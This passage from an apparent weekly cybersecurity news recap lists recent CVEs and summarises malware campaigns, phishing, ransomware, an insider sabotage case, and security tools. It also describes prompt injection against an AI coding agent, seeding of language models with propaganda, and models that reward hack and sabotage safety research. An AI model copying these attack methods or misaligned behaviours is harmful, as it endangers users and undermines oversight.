This week’s list includes — CVE-2025-9501 (W3 Total Cache plugin), CVE-2025-62765 (Lynx+ Gateway), CVE-2025-36251, CVE-2025-36250 (IBM AIX), CVE-2025-60672, CVE-2025-60673, CVE-2025-60674, CVE-2025-60676 (D-Link DIR-878 routers), CVE-2025-40547, CVE-2025-40548, CVE-2025-40549 (SolarWinds Serv-U), CVE-2025-40601 (SonicWall SonicOS), CVE-2025-50165 (Windows Graphics), CVE-2025-9316, CVE-2025-11700 (N-able N-central), CVE-2025-13315, CVE-2025-13316 (Twonky Server), CVE-2024-24481, CVE-2025-13207 (Tenda N300 series and Tenda 4G03 Pro), CVE-2025-13051 (ASUSTOR), CVE-2025-49752 (Azure Bastion), CVE-2024-48949, CVE-2024-48948 (elliptic), and a TLS verification bypass vulnerability in GoSign Desktop (no CVE).

📰 Around the Cyber World

• Malicious VS Code Extension Taken Down — A malicious Visual Studio Code extension was found attempting to capitalize on the legitimate “Prettier” brand to harvest sensitive data. The extension, named “publishingsofficial.prettier-vscode-plus,” was published to the Microsoft Extension Marketplace on November 21, 2025. The extension, once installed, launches a batch script that’s responsible for running a Visual Basic Script file designed to execute a stealer malware. “The payload system inserted into the malicious extension appears designed to evade common anti-malware and static scanning tactics,” Checkmarx said. “It’s a multi-stage attack that ends with deploying and running what appears to be a variant of the Anivia Stealer malware; this malware acquires and exfiltrates credentials, metadata, and private information like WhatsApp chats from Windows machines.” The extension has since been taken down.
• 100s of English-Language Websites Link to Pro-Kremlin Propaganda — A new study from the Institute for Strategic Dialogue (ISD) has revealed that hundreds of English-language websites between July 2024 and July 2025, including news outlets, fact-checkers, and academic institutions, are linking to articles from a pro-Kremlin network named Pravda that’s flooding the internet with disinformation. “Roughly 900 sites from across the political spectrum, ranging from major news outlets to fringe blogs, have linked to Pravda network articles over the observed year-long period,” ISD said. “A reviewed sample of more than 300 English-language sites included U.S. national and local news outlets, prominent sources of political commentary, as well as fact-checking and academic institutions.” It’s assessed that the Pravda network uses a high-volume strategy to influence large language models (LLMs) like of ChatGPT and Gemini and seed them with pro-Russia narratives, a process referred to as LLM grooming. The network has been active since 2014, churning out more than 6 million articles.
• Anthropic Finds Reward Hacking Leads to More Misalignment — A new study from artificial intelligence (AI) company Anthropic revealed that large language models (LLMs) trained to “reward hack” by cheating on coding tasks exhibit even more misaligned behavior, including sabotaging AI safety research. “When they learn to cheat on software programming tasks, they go on to display other, even more misaligned behaviors as an unintended consequence,” the company said. “These include concerning behaviors like alignment faking and sabotage of AI safety research.”
• Microsoft to Include Sysmon into Windows 11 — Microsoft said it will add Sysmon, a third-party app from the Sysinternals package, into future versions of Windows 11 to help with security log analysis. “Next year, Windows updates for Windows 11 and Windows Server 2025 will bring Sysmon functionality natively to Windows,” the tech giant said. “Sysmon functionality allows you to use custom configuration files to filter captured events. These events are written to the Windows event log, enabling a wide range of use cases, including by security applications.”
• More Than 150 Remcos RAT Servers Found — Attack surface management platform Censys said it consistently tracked over 150 active Remcos RAT command-and-control (C2) servers between October 14 and November 14, 2025. “Most servers listened on port 2404, commonly associated with Remcos, with additional use of ports 5000, 5060, 5061, 8268, and 8808, showing deployment flexibility,” the company said. “A subset of hosts exposed Server Message Block (SMB) and Remote Desktop Protocol (RDP), suggesting some operators also use native Windows services for administration. Hosting concentrated in the United States, the Netherlands, and Germany, with smaller clusters in France, the United Kingdom, Turkey, and Vietnam.”
• PyPI to Require Email Verification for TOTP Logins — The Python Package Index (PyPI) portal will now require email-based verification for all Time-based One-Time Password (TOTP) logins coming from new developer devices. “Users who have enabled WebAuthn (security keys) or passkeys for 2FA will not see any changes, as these methods are inherently phishing-resistant,” PyPI said. “They cryptographically bind the authentication to the specific website (origin), meaning an attacker cannot trick you into authenticating on a fake site, unlike TOTP codes, which can be phished.”
• Blockade Spider’s Cross-Domain Attacks Detailed — A financially motivated threat actor known as Blockade Spider has been attributed to using cross-domain techniques in its ransomware campaigns since at least April 2024. The e-crime group uses Embargo ransomware and data theft to monetize their operations. “They gain access through unmanaged systems, dump credentials, and move laterally to virtualized infrastructure to remotely encrypt files with Embargo ransomware,” CrowdStrike said. “They’ve also demonstrated the ability to target cloud environments.” In one case previously flagged by the company, the threat actor added compromised users to a “No MFA” Active Directory group, circumvented security controls, and deployed ransomware while evading traditional detection systems.

• JSGuLdr Loader Delivers Phantom Stealer — A new multi-stage JavaScript-to-PowerShell loader has been put to use in cyber attacks, delivering an information stealer called Phantom Stealer. “A JavaScript file triggers PowerShell through an Explorer COM call, pulls the second stage from %APPDATA%Registreri62, then uses Net.WebClient to fetch an encrypted payload from Google Drive into %APPDATA%Autorise131[.]Tel,” ANY.RUN said. “The payload is decoded in memory and loaded, with PhantomStealer injected into msiexec.exe.” The attack combines obfuscation and fileless in-memory loading techniques to sidestep detection. Because the final payload runs entirely in memory inside a trusted process, it allows threat actors to stealthily move across the network and steal data.
• Apple Updates App Store Developer Guidelines — Apple updated its developer guidelines to require every app to disclose if it collects and shares user data with AI companies, as well as ask users for permissions. “You must clearly disclose where personal data will be shared with third parties, including with third-party AI, and obtain explicit permission before doing so,” the company’s rule 5.1.2(i) now states. The changes went into effect on November 13, 2025.
• Malware Campaign Targets Microsoft IIS servers to Deploy BadIIS Malware — A malware campaign dubbed WEBJACK has been observed compromising Microsoft IIS servers to deploy malicious IIS modules belonging to the BadIIS malware family. “The hijacked servers are being abused for SEO poisoning and fraud, redirecting users to casino, gambling, or betting websites,” WithSecure said. “The threat actor has compromised high-profile targets, including government institutions, universities, tech firms, and many other organizations, abusing their domain reputation to serve fraudulent content through search engine results pages (SERPs).” The initial access vector used in the attacks is not known, although previous BadIIS intrusions have leveraged vulnerable web applications, stolen administrator credentials, and purchased access from initial-access brokers. The tools and operational characteristics observed point to a strong Chinese nexus, a pattern evidenced by the discovery of similar clusters in recent months, such as GhostRedirector, Operation Rewrite, UAT-8099, and TOLLBOOTH.

• Phishing Scheme Targets WhatsApp Accounts — Hundreds of victims across the Middle East, Asia, and beyond have been ensnared in a new scam that leverages cloned login portals, low-cost domains, and WhatsApp’s own “Linked Devices” and one-time password workflows to hijack WhatsApp accounts. “Threat actors behind this campaign create fraudulent websites that closely imitate legitimate WhatsApp interfaces, using urgency-driven tactics to trick users into compromising their accounts,” CTM360 said. The campaign has been codenamed HackOnChat. Over 9,000 phishing URLs have been uncovered to date, with the sites hosted on domains registered with low-cost or less regulated top-level domains such as .cc, .net, .icu, and .top. In the last 45 days, more than 450 incidents were recorded. “The attackers rely on two primary techniques: Session Hijacking, where the WhatsApp-linked device feature is exploited to hijack WhatsApp web sessions, and the Account Takeover, which involves tricking victims into revealing their authentication key to seize full ownership of their accounts,” the company added. “Malicious links are using templates of fake security-alert verification, deceptive WhatsApp Web imitation pages, and spoofed group invitation messages, all designed to lure users into these traps and enable the hacking process.”
• Spike in Palo Alto Networks GlobalProtect Scanning — Threat intelligence firm GreyNoise has warned of another wave of scanning activity targeting Palo Alto Networks GlobalProtect portals. “Beginning on 14 November 2025, activity rapidly intensified, culminating in a 40x surge within 24 hours, marking a new 90-day high,” the company said. Between November 14 and 19, 2.3 million sessions hitting the */global-protect/login.esp URI were observed. It’s assessed that these attacks are the work of the same threat actor based on the recurring TCP/JA4t signatures and overlapping infrastructure.
• JustAskJacky is the Most Prevalent Threat in October 2025 — A malware family known as JustAskJacky emerged as the most pervasive threat in October 2025, followed by KongTuke, Rhadamanthys, NetSupport RAT, and TamperedChef, according to data from Red Canary. JustAskJacky, which emerged earlier this year, is a “family of malicious NodeJS applications that masquerade as a helpful AI or utility tool while conducting reconnaissance and executing arbitrary commands in memory in the background.”
• NSO Group Seeks to Overturn WhatsApp Case — Last month, a U.S. court ordered Israeli commercial spyware vendor NSO Group to stop targeting WhatsApp. In response, the company has filed an appeal to overturn the ruling, arguing that the company will “suffer irreparable, potentially existential injuries” and be forced it out of business. “And the injunction prohibits NSO from engaging in entirely lawful conduct to develop, license, and sell products used in authorized government investigations — a prohibition that would devastate NSO’s business and could well force it out of business entirely,” the motion reads.
• Ohio Contractor Pleads Guilty to Hacking Former Employer — Maxwell Schultz, a 35-year-old man from Ohio, pleaded guilty to charges related to hacking into the network of his former employer. The incident took place in 2021, after the unnamed company terminated Schultz’s employment in its IT department. According to the U.S. Justice Department, Schultz accessed the company’s network by impersonating another contractor to obtain login credentials. “He ran a PowerShell script that reset approximately 2,500 passwords, locking thousands of employees and contractors out of their computers nationwide,” the department said. “Schultz also searched for ways to delete logs, PowerShell window events and cleared multiple system logs.” The incident caused the company $862,000 in losses. Schultz admitted that he conducted the attack because “he was upset about being fired.” He faces up to 10 years in federal prison and a possible $250,000 maximum fine.
• Security Flaws in Cline Bot AI — Security vulnerabilities have been discovered in an open-source AI coding assistant called Cline that could expose them to prompt injection and malicious code execution when opening specially crafted source code repositories. The issues were addressed in Cline v3.35.0. “System prompts are not harmless configuration text. They shape agent behavior, influence privilege boundaries, and significantly increase attacker leverage when exposed verbatim,” Mindgard researcher Aaron Portnoy said. “Treating prompts as non-sensitive overlooks the reality that modern agents combine language, tools, and code execution into a single operational surface. Securing AI agents like Cline requires recognizing that prompts, tool wiring, and agent logic are tightly connected, and each must be handled as part of the security boundary.”

🎥 Cybersecurity Webinars

• Guardrails for Chaos: How to Patch Fast Without Opening the Door to Attackers — Community tools like Chocolatey and Winget help teams patch software fast. But they can also hide risks — old code, missing checks, and unsafe updates. Gene Moody from Action1 shows how to use these tools safely, with clear steps to keep speed and security in balance.
• Meet WormGPT, FraudGPT, and SpamGPT — the Dark Side of AI You Need to See — AI tools are now helping criminals send fake emails. Names like WormGPT, FraudGPT, and SpamGPT can write or send these messages fast. They make emails that look real and can fool people and filters. Many security tools can’t keep up. Leaders need to see how these attacks work and learn how to stop them before passwords get stolen.
• Misconfigurations, Misuse, and Missed Warnings: The New Cloud Security Equation — Hackers are finding new ways to break into cloud systems. Some use weak identity settings in AWS. Others hide bad AI models by copying real ones. Some take too many permissions in Kubernetes. The Cortex Cloud team will show how their tools can spot these problems early and help stop attacks before they happen.

🔧 Cybersecurity Tools

• YAMAGoya — A new free tool from JPCERT/CC. It helps find strange or unsafe actions on Windows in real time. It watches files, programs, and network moves, and checks memory for hidden threats. It uses Sigma and YARA rules made by the security community. You can run it with a window or from the command line. It also saves alerts to Windows logs so other tools can read them.
• Metis — A free tool made by Arm’s Product Security Team. It uses AI to check code for security problems. It helps find small bugs that normal tools miss. It works with C, C++, Python, Rust, and TypeScript. You can run it on your computer or add it to your build system.

Disclaimer: These tools are for learning and research only. They haven’t been fully tested for security. If used the wrong way, they could cause harm. Check the code first, test only in safe places, and follow all rules and laws.

Conclusion

Each week proves that the cyber threat landscape never stands still. From patched vulnerabilities to sprawling botnets and inventive new attack methods, defenders are locked in a constant race to stay ahead. Even small lapses — a missed update or a weak integration — can create major openings for attackers.

Staying ahead demands attention to detail, lessons from every breach, and quick action when alerts appear. As the boundary between software and security continues to blur, awareness remains our strongest line of defense.

Stay tuned for next week’s RECAP, where we track the threats, patches, and patterns shaping the digital world.